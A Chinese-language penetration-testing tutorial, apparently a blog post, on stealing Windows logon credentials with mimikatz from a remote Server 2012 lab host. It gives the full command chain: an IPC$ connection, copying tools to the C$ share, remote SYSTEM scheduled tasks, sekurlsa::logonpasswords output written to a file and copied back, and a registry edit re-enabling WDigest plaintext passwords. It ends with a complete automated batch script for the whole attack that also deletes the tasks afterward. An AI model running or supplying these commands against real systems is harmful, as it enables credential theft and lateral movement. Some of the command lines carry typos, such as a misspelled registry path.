mimikatz抓取密码

一、上传mimikatz到2012

1、使用脚本建立ipc$连接

net use #查看是否连接成功

2、上传mimikatz工具包和减压脚本

copy mimikatz_trunk.zip \\192.168.139.128\c$
copy jianya.bat \\192.168.139.128\c$

3、设置定时任务执行减压脚本

schtasks /create /s 192.168.139.128 /ru "SYSTEM" /tn jianya /sc DAILY /tr C:\jianya.bat /F #系统大于等于windows2012 创建jianya对应执行文件
schtasks /run /s 192.168.139.128 /tn jianya /i  #运行jianya任务
dir \\192.168.139.128\c$ #查看目标c盘目录

mimikatz工具包和减压脚本全部上传成功

jianya.bat已成功执行，mimikatz工具包已减压缩成功

二、执行mimikatz

1、建立执行mimikatz工具的脚本–>mimika.bat

cd /
cd mimikatz
cd /x64
mimikatz.exe "privilege::debug "sekurlsa::logonpasswords full" exit >> c:\pass.txt
#该脚本将mimikatz.exe执行的结果保存到c盘pass.txt文件中

2、上传并执行mimikatz脚本

copy mimika.bat \\192.168.139.128\c$
schtasks /create /s 192.168.139.128 /ru "SYSTEM" /tn mimika /sc DAILY /tr C:\mimika.bat /F #系统大于等于windows2012 创建mimika对应执行文件
schtasks /run /s 192.168.139.128 /tn mimika /i  #运行mimika任务
dir \\192.168.139.128\c$ #查看目标c盘目录

将pass.txt下载到主机

type \\192.168.139.128\c$\pass.txt >> c:\pass.txt

administrator的密码hash值

3、由于在系统版本大于windows serve 2012 或者系统安装了KB287199补丁时，系统的内部就不会在保存明文密码，这样是用mimikatz就无法从内存中读取明文密码，除非修改注册表，然后让用户重新登录

reg add HKLM\SYSTEM\CurrentControlSet\Centrol\SecurityProvider\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

三、总结

在知道目标ip密码和用户的情况下，可以直接使用ipc$连接上传mimikatz工具集，使用脚本将其减压、执行，然后将mimikatz抓取的密码再次回写到主机c盘

如果不知道目标的这些信息可以使用python脚本爆破，但是效率低而且如果密码复杂，很难爆破成功

mimikatz.bat

@echo off
cd /
cd /Users/Administrator
cd Desktop
set /p ip=ip:::
set /p pass=password:::
set /p user=username:::
net use \\%ip% /del > nul
echo 已清除ipc连接，重新连接ipc
net use \\%ip%\ipc$ %pass% /user:%user% > nul
echo 回车复制减压脚本到目标并执行，耐心等待
pause >nul
echo.
copy mimikatz_trunk.zip \\192.168.139.128\c$
copy jianya.bat \\192.168.139.128\c$
echo.
schtasks /create /s 192.168.139.128 /ru "SYSTEM" /tn jianya /sc DAILY /tr C:\jianya.bat /F > nul
schtasks /run /s 192.168.139.128 /tn jianya /i > nul
schtasks /delete /s 192.168.139.128 /tn jianya /f > nul
echo 减压mimikatz工具集成功
echo 回车复制执行mimikatz脚本到目标并执行,耐心等待
pause > nul
echo.
copy mimika.bat \\192.168.139.128\c$
echo.
schtasks /create /s 192.168.139.128 /ru "SYSTEM" /tn mimika /sc DAILY /tr C:\mimika.bat /F > nul
schtasks /run /s 192.168.139.128 /tn mimika /i > nul
schtasks /delete /s 192.168.139.128 /tn mimika /f > nul
ping -n 5 127.0.0.1 > nul
echo.
type \\192.168.139.128\c$\pass.txt >> c:\pass.txt
echo 内容已放到c盘pass.txt文件中
pause > nul

jianya.bat

unzip.exe -d c:\mimikatz c:\mimikatz_trunk.zip 

mimika.bat

cd /
cd mimikatz
cd x64
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit >> c:\pass.txt